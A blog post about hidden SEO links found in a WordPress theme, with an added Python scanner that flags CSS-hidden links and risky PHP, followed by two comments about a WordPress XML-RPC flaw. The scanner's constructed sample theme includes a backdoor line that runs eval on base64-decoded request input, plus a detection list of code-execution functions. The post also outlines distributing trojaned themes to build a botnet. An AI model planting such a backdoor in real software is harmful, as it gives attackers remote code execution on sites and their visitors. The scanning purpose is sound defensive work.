Some time ago, I wrote that I was planning on using a new theme for this blog. To do this, I first looked for possible candidates on themes.wordpress.net, and then started to adapt the one I liked. However, while working on it, I noticed hidden links in the theme's code.
These links were hidden with “font-size: 1px”. Hidden links like these exist to boost the search-engine ranking of the theme's creator and his affiliates. In this case the creators were ‘wildconcepts.net’. You can check their stats on Technorati and see that about 250 blogs link to them, mostly via the regular theme credits.
Upon further examination, I found two more themes by these guys with the same hidden SEO links.
Afterwards, I checked some 20 blogs that used their themes; about half of them still had the SEO (Search Engine Optimization) links in place. Other linked URLs were kianah.com (a blog) and ads-ph.com (an ad exchange service).
I reported this to themes.wordpress.net, and it seems the themes can no longer be found via the site's search. However, they are still available for download.
The SEO links, while an annoyance and an underhanded thing to do, are not the main issue here. The big problem I had with this theme is that someone who has no compunction about planting SEO links might plant a backdoor as well. I'm not saying these guys did it, but I know that if I were a bad guy looking to make money, I would.
This is a very easy way to infect servers: prepare a few good-looking themes for WordPress, phpBB or any other standard web application, sit back, and watch the botnet grow. You not only get to infect the server, you can also try to infect every client that connects to it, since the theme controls the HTML that is served to visitors. Instead of researching a new vulnerability, you just use social engineering, exactly as is already done against end users surfing the web.
You publish your themes and, evidently, they won't go through much scrutiny. With an appropriate Google Alert in place (for instance on the credit line the theme prints in its footer), you will also be told whenever someone new installs one.
This is a trust issue, and it seems you shouldn't trust WordPress's theme database. While this may seem obvious to you, it wasn't to me at first, and I bet it isn't obvious to many others starting a small blog and looking for a good theme.
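As an added example (not code from the original post, nor from any of the themes mentioned), here is a heuristic scanner that does by script what the post describes doing by hand: it flags anchors hidden by CSS (the “font-size: 1px” trick above, and also display:none, visibility:hidden and negative text-indent, whether set inline or through a class defined in style.css) and PHP constructs that have no business in a theme (eval, base64_decode and friends, shell execution). The theme files and domain names embedded in it are constructed for the demonstration; the patterns are triage heuristics for a human review, not proof of malice.

```python
"""Heuristic scanner for hidden SEO links and suspicious PHP in a WordPress theme.

Added example, not code from the original post. The theme files below are
constructed for demonstration; every domain in them is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

FONT_SIZE = re.compile(r"font-size\s*:\s*(\d+(?:\.\d+)?)\s*(px|pt|em|%)?", re.I)
OTHER_HIDING = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|text-indent\s*:\s*-\d", re.I)
CSS_RULE = re.compile(r"([^{}]+)\{([^}]*)\}", re.S)
TAG_WITH_STYLE = re.compile(r"<(\w+)[^>]*\bstyle\s*=\s*[\"']([^\"']*)[\"'][^>]*>", re.I)
TAG_WITH_CLASS = re.compile(r"<(\w+)[^>]*\bclass\s*=\s*[\"']([^\"']*)[\"'][^>]*>", re.I)
HREF = re.compile(r"<a\b[^>]*\bhref\s*=\s*[\"']([^\"']+)[\"']", re.I)

# PHP constructs a theme almost never needs legitimately, and the usual building
# blocks of a dropped-in backdoor. Heuristic: every hit needs a human look.
SUSPICIOUS_PHP = [
    (re.compile(r"\beval\s*\(", re.I), "eval()"),
    (re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), "obfuscation decoder"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I), "command execution"),
    (re.compile(r"\b(create_function|assert)\s*\(", re.I), "dynamic code execution"),
]

# Constructed sample theme: a legitimate credit hidden via a CSS class, an
# inline-hidden SEO link, and an obfuscated payload in functions.php.
SAMPLE_THEME = {
    "style.css": """/* Theme: Constructed Example */
body { font-size: 12px; }
.credit { font-size: 1px; }
""",
    "footer.php": """<div id="footer">
  <p>Powered by <a href="http://wordpress.org/">WordPress</a>.</p>
  <p class="credit">Theme by <a href="http://theme-author.example/">Theme Author</a></p>
  <span style="font-size: 1px"><a href="http://seo-target.example/">cheap widgets</a></span>
</div>
<?php wp_footer(); ?>
""",
    "functions.php": """<?php
add_action('wp_footer', 'theme_footer_hook');
function theme_footer_hook() {
    // constructed example of the obfuscated payload a backdoored theme might carry
    eval(base64_decode($_REQUEST['c']));
}
""",
}


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str
    detail: str


def is_hiding_style(style: str) -> bool:
    """True if this CSS text makes the element invisible to a human visitor."""
    if OTHER_HIDING.search(style):
        return True
    for m in FONT_SIZE.finditer(style):
        size, unit = float(m.group(1)), (m.group(2) or "px").lower()
        if unit in ("px", "pt") and size <= 1:
            return True
        if (unit == "em" and size <= 0.1) or (unit == "%" and size <= 10):
            return True
    return False


def hidden_classes(css: str) -> Set[str]:
    """Single-class selectors whose rule hides the element, e.g. `.credit { font-size: 1px }`."""
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)  # drop comments before parsing
    found = set()
    for selectors, body in CSS_RULE.findall(css):
        if is_hiding_style(body):
            for sel in selectors.split(","):
                m = re.fullmatch(r"\s*\.([\w-]+)\s*", sel)
                if m:
                    found.add(m.group(1))
    return found


def _line_of(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1


def _links_in_element(text: str, m) -> List[str]:
    """hrefs from an opening-tag match up to its closing tag (nesting is not tracked)."""
    close = re.compile(r"</%s\s*>" % re.escape(m.group(1)), re.I).search(text, m.end())
    end = close.end() if close else len(text)
    return HREF.findall(text[m.start():end])


def scan_theme(files: Dict[str, str]) -> List[Finding]:
    """Scan a {relative path: contents} map of a theme; returns sorted, de-duplicated findings."""
    hidden = set()
    for path, text in files.items():
        if path.endswith(".css"):
            hidden |= hidden_classes(text)
    findings = set()
    for path, text in files.items():
        if not path.endswith((".php", ".html")):
            continue
        for m in TAG_WITH_STYLE.finditer(text):
            if is_hiding_style(m.group(2)):
                for href in _links_in_element(text, m):
                    findings.add(Finding(path, _line_of(text, m.start()), "hidden link", href))
        for m in TAG_WITH_CLASS.finditer(text):
            if hidden.intersection(m.group(2).split()):
                for href in _links_in_element(text, m):
                    findings.add(Finding(path, _line_of(text, m.start()), "hidden link", href))
        for pattern, label in SUSPICIOUS_PHP:
            for m in pattern.finditer(text):
                findings.add(Finding(path, _line_of(text, m.start()), "suspicious php", label))
    return sorted(findings, key=lambda f: (f.path, f.line, f.kind, f.detail))


if __name__ == "__main__":
    for f in scan_theme(SAMPLE_THEME):
        print(f"{f.path}:{f.line}: {f.kind}: {f.detail}")
```

On the constructed theme this reports both hidden links in footer.php (one hidden by the .credit class, one by the inline style) and the eval/base64_decode pair in functions.php. To run it against a real theme, read every file under the theme directory into the same path-to-contents map and pass it to scan_theme. Expect false positives on themes that legitimately use display:none for menus; the point is to get a short list worth reading.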
Was it the themes themselves, or sites being hit by this:
http://wordpress.org/development/2008/02/wordpress-233/
This was being actively exploited for several weeks, frequently from Chinese-owned IP addresses, before the upgrade was available. It allows remote post modification without authentication via the XML-RPC interface.
The problem I’m describing is that the themes are troublesome.
The exploit you're talking about is based on a vulnerability in xmlrpc.php, which is part of the WordPress code, not theme code.